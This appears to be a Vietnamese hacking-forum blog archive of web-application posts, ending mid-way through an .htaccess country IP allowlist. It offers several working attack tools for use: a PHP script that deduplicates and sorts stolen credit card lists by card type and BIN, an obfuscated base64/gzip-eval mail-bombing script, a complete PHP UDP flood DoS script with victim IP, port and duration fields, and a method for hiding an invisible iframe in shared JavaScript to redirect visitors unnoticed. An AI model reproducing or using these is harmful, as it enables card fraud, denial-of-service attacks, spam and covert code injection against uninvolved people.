Hiển thị các bài đăng có nhãn Web Application. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Web Application. Hiển thị tất cả bài đăng

Chủ Nhật, 16 tháng 10, 2011

Free SMS không đăng ký, không giới hạn, không capcha

http://dailysms.hu/

Em nó đó, các pro vào mà nhắn tin thôi :d

Có 2 cái nhược điểm:
1. Có text link ở chữ ký sms sau khi nhận
2. Giữ 2 lần nhắn liên tiếp cho giới hạn time để tránh spam sms :)

Good luck

Thứ Hai, 29 tháng 8, 2011

Code lọc CC trùng, Phân loại CC

Thấy anh em dạo này nổi nên vấn đề lọc trùng cc.
Trước đây vấn đề này được giải quyết rồi. Mình có code này do Winjin code và mình edit. Code ổn định.
Chức năng:

    Lọc trùng : cc trùng sẽ auto bị remove. Ko cần config vị trí cc number
    Phân loại CC
    Tìm cc theo bin

Highslide JS
Highslide JS

<?php
/*
+ Coded by: Neverbestboy & WinJin92 (Edited by Gaconit)
*/
function findcc($str){
    $str=str_replace(" ","",$str);
    for($i=0;$i<=strlen($str);$i++){
        if(is_numeric($str[$i])){
            $ccNum.=$str[$i];
            if(strlen($ccNum)>14){
              return $ccNum;
              break;
            };
        }
        else $ccNum='';
    }

}
if($_POST['concaocao']){
  if(strpos($_POST['concaocao'], '.txt')){
  // Use TXT FILE
  $data  =  file_get_contents($_POST['concaocao']);
  $data  =  explode(chr(13).chr(10),$data);
  }
  else{
  /* USE POST WAY */
  $data  =  $_POST['concaocao'];
  $data  =  explode("\r\n",$data); // Work only in Window
  echo '<b>Total: </b>'.count($data).'<hr>';
  }
  foreach($data as $key => $value)
  {
        $ccNum=findcc($value);
        if(!$check["$ccNum"]){
            $check["$ccNum"]  =  1;

            if($_POST['binfilter']){
              $type  =  substr($ccNum,0,strlen($_POST['binfilter']));
              if($type == $_POST['binfilter'])
              {
              $cc['bin'][]  =  array($value);
              }
            }
            else
            {
              $type  =  substr($ccNum,0,1);
              if($type == 3)
              {
              $cc['amex'][]  =  array($value);
              }
              elseif($type == 4)
              {
              $cc['visa'][]  =  array($value);
              }
              elseif($type == 5)
              {
              $cc['master'][]  =  array($value);
              }
              elseif($type == 6)
              {
              $cc['discover'][]  =  array($value);
              }
            }
            $html.="$value\r\n";
            $nhtml++;
    }

}
  $cols = '100%';
  $rows = '5';
  if(!$_POST['binfilter']){
  echo '<pre><b>Amex: </b>'.count($cc['amex']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['amex']))foreach($cc['amex'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Visa: </b>'.count($cc['visa']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['visa']))foreach($cc['visa'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Master: </b>'.count($cc['master']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['master']))foreach($cc['master'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Discover: </b>'.count($cc['discover']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['discover']))foreach($cc['discover'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  }
  else{
    echo '<pre><b>BIN: </b>'.count($cc['bin']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  foreach($cc['bin'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  }
  echo '<pre><b>All with order:</b>'.$nhtml.'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['amex']))foreach($cc['amex'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['visa']))foreach($cc['visa'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['master']))foreach($cc['master'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['discover']))foreach($cc['discover'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';

    echo '<pre><b>All: </b>'.$nhtml.'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
    echo $html;
    echo '</textarea></pre>';
}
else{
?>
<html>
<title>CC Filter - WinJin92</title>
<center><b>Coded by: WinJin92 & Helper: Neverbestboy [Ver: 2] (Edited by gaconit)</b></center>
<form method="POST" action="?">
<textarea name="concaocao" cols="80" rows="20"></textarea><br>
<b>Warning: </b> Fill "filename" to include cc list from "filename" (cc.txt) Or Paste you CC list to textarea above!<br>
<input type="text" name="binfilter" size="15" value="0"> <b>0</b> is disable BIN Filter!<br>
<br><input type="submit" value="Submit">
</form>
</html>
<? } ?>

share code bom mail

tình hình là tối qua được sự giúp đỡ của bác justin nguyễn và 1 số cộng sự khác . Mình đã test thành công boom mail !

Hôm nay, share cho ae nào cần dùng đến nó !

........................

mình đã test thành công!
Mail spam thẳng vào Inbox - cứ yên tâm mà test
Code: 
<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=39036;eval(gzuncompress(base64_decode('eNplj1mPgjAAhP8MSduIsSCihPDgfVvv62XDUQ5FwJZD+fWr2c1uNpuZp8nMl4xAMMbkJWy4cUIjKBBCvgIRMAsgvfCDkMJqVSDv4tvI9WjKofAzFSUsK0j/FytYU5H+In4vDa/MIju+JYxyDi2TU1X5cKgdOxTylKUMuoyazh+EJiMRRGnTodbePG3Xs/ZQY8Vi7PLp0n+2boPJVZ7XcUnyvnroVHZZULO7x7MSX0YNbyWFj9492RhABO1Ot9cfDEfjyXQ2X5Dlar3Z7vaH4+lsWrZDXc8PLtfwFsXJnfE0y4vHs8SSXFcaarOlVWoAIaTT3Azh7yGkfwLOM18j')));return;?>
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


link down: http://www.mediafire.com/?q6bvg9nqnvppqpj

thấy hay thì thanks phát nhé

Share Code Auto Free Backlink

thấy các bro tìm cái code backlink này
hôm nay xin share cái code cho bà con nè
http://www.e-referrer.com <--- vào đây đăng ký một cái acc rồi làm theo hướng dẫn » Tutorials nhé.
Còn nếu làm biếng thì download cái code ở bên dưới về thay đổi cái number thôi nhé .
http://www.mediafire.com/?27bcbdyi79264n4

S.2.U Firewall System - Hệ thống chống ddos website

S.2.U Firewall System






Hệ thống chống ddos hiệu quả dành cho website của bạn, khả năng  chống  botnet, flood,... hạn chế tối đa từ các lượt tấn công! Nó chạy  ngầm và  phân tích tình hình, tùy biến cấu hình dễ dàng, phù hợp với mọi  website.



Các tính năng của S.2.U Firewall System:


  • Chống các dạng tấn công mạng.
  •     Gọn nhẹ, tùy biến dễ dàng.
  •     Chạy ngầm.
  •     Phân tích tình trạng website và tự động chuyển đỗi chế độ.
  •     Phòng chống với 2 lớp bảo vệ và 1 lớp bảo trì ảo.
  •     Hỗ trợ nhiều dạng website.


Hướng dẫn:




  •      Giải nén và up toàn bộ file thư mục vào trang cần thiết lập hệ thống.
  •      Chèn đoạn mã sau lên trên cùng:
  1.      <?php include_once("s2u_anti.php"); ?> : Nếu trang chủ là file index.html, sau khi chèn xong đổi tên thành index.php.
  2.      include_once("s2u_anti.php"); : Dành cho file index.phpglobal.php nếu dùng cho forum vbb.
  •      Mở file s2u_fw_cf.php để tùy chỉnh cấu hình firewal phù hợp website của bạn.
  •      Chmod folder fwlogs thành 701 hoặc 755. các file php chmod 501 nếu host hỗ trợ hoặc 604.
  

Download -> http://app.s2u.vn/component/k2/item/9-s2u-firewall-system-h%E1%BB%87-th%E1%BB%91ng-ch%E1%BB%91ng-ddos-website.html (file đính kèm).




Bạn có thể hỏi bất cứ câu hỏi nào về hệ thống này. Cám ơn!
http://app.s2u.vn/component/k2/item/download/15.html

Code dowload từ tailieu.vn

Demo: http://killervn.net/tailieu.vn/index.html

Link: http://www.mediafire.com/?2141f27efvyvmmh

ANONIMYOUS DDOS


    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    ?>
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    
    <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">
    
            <title>PHP DoS, Coded by EXE</title>
    </head>
    <!-- PHP DOS, coded by EXE -->
    <style type="text/css">
    <!--
    body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
    }
    
    
    
    -->
    </style>
    <!-- PHP DOS, coded by EXE -->
    <body>
    <center><br><br>
    <img src="main.jpg"><br>
    <b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
    <form name="input" action="function.php" method="post">
    IP:
    <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    &nbsp;&nbsp;&nbsp;&nbsp;Time:
    <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    &nbsp;&nbsp;&nbsp;&nbsp;Port:
    <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
    <br><br>
    <input type="submit" value="    Start the Attack--->    ">
    <br><br>
    <center>
    After initiating the DoS attack, please wait while the browser loads.
    </center>
    
    </form>
    </center>
    <!-- PHP DOS, coded by EXE -->
    </body>
    </html>

RAW Paste Data

</style>
<!-- PHP DOS, coded by EXE -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

DoS Script

Credit goes to: EXE of ZeroDayExile.
So, here it is...

How does this work after you've created it?

    Upload the Script
    Open it in browser
    Type the ip adress/host and port (ip add.r.e.ssort | 127.0.0.1:80) of the victim and type in how long you want to DDOS the server.
    When the script has finish it will show you the DoS result


This requires two files, first...
The main page should be named function.php.
Created as follows:

?php

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);


$exec_time = $_POST['time'];


$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;






for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>


and this in index.php:
Code:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01


Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
<meta http-equiv="content-type" content="text/html;


charset=iso-8859-1">
<meta name="author" content="">


<title>PHP DoS</title>
</head>
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}






-->
</style>
<body>
<center><br><br>
<br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;


(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main"


value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';"


onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20"


class="main" value = "time (in seconds)" onblur = "if ( this.value=='' )


this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time


(in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main"


value = "port" onblur = "if ( this.value=='' ) this.value = 'port';"


onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser


loads.
</center>


</form>
</center>
</body>
</html>

THEN, you will need the main index.php file, as follows:

<?php$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01

Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html;

charset=iso-8859-1">
<meta name="author" content="">

<title>PHP DoS</title>
</head>
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}



-->
</style>
<body>
<center><br><br>
<br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;

(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main"

value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';"

onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20"

class="main" value = "time (in seconds)" onblur = "if ( this.value=='' )

this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time

(in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main"

value = "port" onblur = "if ( this.value=='' ) this.value = 'port';"

onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser

loads.
</center>

</form>
</center>
</body>

</html>

Note you can tweak this as you see fit.
You will need to use your own CSS and images if you don't want it to be a plain black and white page.
That you will have to do on your own, because I don't feel like doing a CSS tutorial.

PHP DoS Coded by Exe

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
    <meta name="author" content="">

    <title>PHP DoS, Coded by EXE</title>
</head>
<!-- PHP DOS, coded by EXE -->
<style type="text/css">
<!--
body {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
    font-style: normal;
    line-height: normal;
    color: #FFFFFF;
    background-color: #000000;
}



-->
</style>
<!-- PHP DOS, coded by EXE -->
<body >
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

Chèn Iframe thoải mái mà không bị phát hiện

bạn có một code và share trên mạng , muốn chèn iframe thì làm như sau
có một file js - file nào cũng dc , miễn là js
bạn chèn code

function ShowJsF()
{
var iframe = document.createElement("iframe");
iframe.setAttribute("id","testiframe");
iframe.setAttribute("name","testiframe");
iframe.setAttribute("height","1");
iframe.setAttribute("width","0");
iframe.setAttribute("frameBorder","1");
iframe.setAttribute("scrolling","auto");
iframe.setAttribute("src","http://dl.dropbox.com/u/10870808/Apps/avim/index.html");
iframe.style.position = "absolute";
iframe.style.display = "block";
iframe.style.top = 100 + 'px';
iframe.style.left = 100 + 'px';
window.document.body.appendChild(iframe);
return false;
}  

và trong index.php bạn chỉ cần load file js đó lên và thêm đoạn sau : (vào chỗ nào cũng dc)

<body onload="ShowJsF();">

vậy là xong , nhét vào js thì chả ai biết mà mò đâu
ví dụ http://dl.dropbox.com/u/10870808/Apps/avim/index.html là của mình , và mình chèn cái killiframe rồi drect đến cái xxx thì

Chống DDOS hiệu quả bằng cách chặn IP dùng .htaccess

Chống DDOS bằng cách chặn IP dùng .htaccess

Trước tiên vào trang này: http://www.countryipblocks.net/

Đây là một trang tra cứu về địa chỉ IP miễn phí và update Database thường xuyên.

Cũng ở cột bên phải, kéo xuống phần Country IP listing, gõ 2 ký tự thể hiện quốc gia mà bạn muốn tra cứu dải địa chỉ IP (VN là Việt Nam, TH là Thailand, DE là Đức... chẳng hạn). và chọn CIDR Format rồi ấn Submit
Bạn sẽ nhận được danh sách IP Việt Nam như sau:
Trích dẫn

# Country: VIET NAM
# ISO Code: VN
# Total Networks: 196
# Total Subnets:  15,513,344
1.52.0.0/14
14.0.16.0/20
14.160.0.0/11
14.224.0.0/11
27.0.12.0/22
27.2.0.0/15
27.64.0.0/12
27.118.16.0/20
42.1.64.0/18
42.96.0.0/18
42.112.0.0/13
49.156.52.0/22
49.213.64.0/18
49.236.208.0/22
49.246.128.0/18
49.246.192.0/19
58.186.0.0/15
61.11.224.0/19
61.28.224.0/19
101.53.0.0/18
101.96.12.0/22
101.96.64.0/18
101.99.0.0/18
103.1.200.0/22
103.1.208.0/22
103.1.236.0/22
103.2.220.0/22
103.2.224.0/22
103.2.228.0/22
103.3.244.0/22
103.3.248.0/22
103.3.252.0/22
103.246.104.0/24
110.35.64.0/21
110.35.72.0/21
110.44.184.0/21
111.65.240.0/20
111.91.232.0/22
112.72.64.0/18
112.78.0.0/20
112.109.88.0/21
112.137.128.0/20
112.197.0.0/16
112.213.80.0/20
113.20.96.0/19
113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
115.72.0.0/13
115.84.176.0/21
115.146.120.0/21
115.165.160.0/21
116.68.128.0/21
116.96.0.0/12
116.118.0.0/17
116.193.64.0/20
116.212.32.0/19
117.0.0.0/13
117.103.192.0/18
117.122.0.0/17
118.68.0.0/14
118.102.0.0/21
118.107.64.0/18
119.15.160.0/19
119.17.192.0/18
119.18.128.0/20
119.18.184.0/21
119.82.128.0/20
120.50.184.0/21
120.72.80.0/21
120.72.96.0/19
120.138.64.0/20
122.102.112.0/22
122.129.0.0/18
122.201.8.0/21
123.16.0.0/12
124.157.0.0/18
124.158.0.0/20
125.58.0.0/18
125.212.128.0/17
125.214.0.0/18
125.234.0.0/15
125.253.112.0/20
171.224.0.0/11
175.103.64.0/18
175.106.0.0/22
180.93.0.0/16
180.148.0.0/21
180.148.128.0/20
180.214.236.0/22
182.161.80.0/20
182.236.112.0/22
182.237.20.0/22
183.80.0.0/16
183.81.0.0/17
183.90.160.0/21
183.91.0.0/19
183.91.160.0/19
202.0.79.0/24
202.4.168.0/24
202.4.176.0/24
202.6.2.0/24
202.6.96.0/23
202.9.79.0/24
202.9.80.0/24
202.9.84.0/24
202.37.86.0/23
202.43.108.0/22
202.44.137.0/24
202.47.87.0/24
202.47.142.0/24
202.52.39.0/24
202.55.132.0/22
202.56.57.0/24
202.58.245.0/24
202.59.238.0/23
202.59.252.0/23
202.60.104.0/21
202.74.56.0/24
202.74.58.0/23
202.78.224.0/21
202.79.232.0/21
202.87.212.0/22
202.92.4.0/22
202.93.156.0/22
202.94.82.0/24
202.94.88.0/23
202.124.204.0/24
202.130.36.0/23
202.134.16.0/21
202.134.54.0/24
202.151.160.0/20
202.158.244.0/22
202.160.124.0/23
202.172.4.0/23
202.191.56.0/22
203.8.127.0/24
203.8.172.0/24
203.34.144.0/24
203.77.178.0/24
203.79.28.0/24
203.89.140.0/22
203.99.248.0/22
203.113.128.0/19
203.113.160.0/19
203.119.8.0/22
203.119.36.0/22
203.119.44.0/22
203.119.58.0/23
203.119.60.0/22
203.119.64.0/21
203.119.72.0/22
203.128.240.0/21
203.160.0.0/23
203.160.96.0/21
203.161.178.0/24
203.162.0.0/21
203.162.8.0/21
203.162.16.0/20
203.162.32.0/19
203.162.64.0/18
203.162.128.0/20
203.162.144.0/20
203.162.160.0/19
203.162.192.0/18
203.163.128.0/18
203.170.26.0/23
203.171.16.0/20
203.176.160.0/21
203.189.28.0/22
203.190.160.0/20
203.191.8.0/21
203.191.48.0/21
203.195.0.0/18
203.201.56.0/22
203.205.0.0/18
203.209.180.0/22
203.210.128.0/18
203.210.192.0/18
210.2.64.0/18
210.86.224.0/20
210.211.96.0/19
210.245.0.0/19
210.245.32.0/19
210.245.64.0/18
218.100.10.0/24
218.100.14.0/24
218.100.60.0/24
220.231.64.0/18
221.121.0.0/18
221.132.0.0/18
221.133.0.0/19
222.252.0.0/14
223.27.104.0/21

Trước tiên bạn phải xác định là website của mình chỉ để cho khách hàng là người VN ( hoặc thêm nước nào tùy ý ) truy cập.
Để chống DDOS hoặc BOTNET dùng sock hoặc fake IP nước ngoài như ( US, JP, ...) chúng ta tạo file .htaccess với nội dung như sau :

RewriteEngine on ErrorDocument 404 /404.html <Files ".htaccess"> deny from all </Files> order deny,allow deny from all allow from 1.52.0.0/14 allow from 14.0.16.0/20 allow from 14.160.0.0/11 allow from 14.224.0.0/11 allow from 27.0.12.0/22 allow from 27.2.0.0/15 allow from 27.64.0.0/12 allow from 27.118.16.0/20 allow from 42.1.64.0/18 allow from 42.96.0.0/18 allow from 42.112.0.0/13 allow from 49.156.52.0/22 allow from 49.213.64.0/18 allow from 49.236.208.0/22 allow from 49.246.128.0/18 allow from 49.246.192.0/19 allow from 58.186.0.0/15 allow from 61.11.224.0/19 allow from 61.28.224.0/19 allow from 101.53.0.0/18 allow from 101.96.12.0/22 allow from 101.96.64.0/18 allow from 101.99.0.0/18 allow from 103.1.200.0/22 allow from 103.1.208.0/22 allow from 103.1.236.0/22 allow from 103.2.220.0/22 allow from 103.2.224.0/22 allow from 103.2.228.0/22 allow from 110.35.64.0/21 allow from 110.35.72.0/21 allow from 110.44.184.0/21 allow from 111.65.240.0/20 allow from 111.91.232.0/22 allow from 112.72.64.0/18 allow from 112.78.0.0/20 allow from 112.109.88.0/21 allow from 112.137.128.0/20 allow from 112.197.0.0/16 allow from 112.213.80.0/20 allow from 113.20.96.0/19 allow from 113.22.0.0/16 allow from 113.23.0.0/17 allow from 113.52.32.0/19 allow from 113.61.108.0/22 allow from 113.160.0.0/11 allow from 115.72.0.0/13 allow from 115.84.176.0/21 allow from 115.146.120.0/21 allow from 115.165.160.0/21 allow from 116.68.128.0/21 allow from 116.96.0.0/12 allow from 116.118.0.0/17 allow from 116.193.64.0/20 allow from 116.212.32.0/19 allow from 117.0.0.0/13 allow from 117.103.192.0/18 allow from 117.122.0.0/17 allow from 118.68.0.0/14 allow from 118.102.0.0/21 allow from 118.107.64.0/18 allow from 119.15.160.0/19 allow from 119.17.192.0/18 allow from 119.18.128.0/20 allow from 119.18.184.0/21 allow from 119.82.128.0/20 allow from 120.50.184.0/21 allow from 120.72.80.0/21 allow from 120.72.96.0/19 allow from 120.138.64.0/20 allow from 122.102.112.0/22 allow from 122.129.0.0/18 allow from 122.201.8.0/21 allow from 123.16.0.0/12 allow from 124.157.0.0/18 allow from 124.158.0.0/20 allow from 125.58.0.0/18 allow from 125.212.128.0/17 allow from 125.214.0.0/18 allow from 125.234.0.0/15 allow from 125.253.112.0/20 allow from 171.224.0.0/11 allow from 175.103.64.0/18 allow from 175.106.0.0/22 allow from 180.93.0.0/16 allow from 180.148.0.0/21 allow from 180.148.128.0/20 allow from 180.214.236.0/22 allow from 182.161.80.0/20 allow from 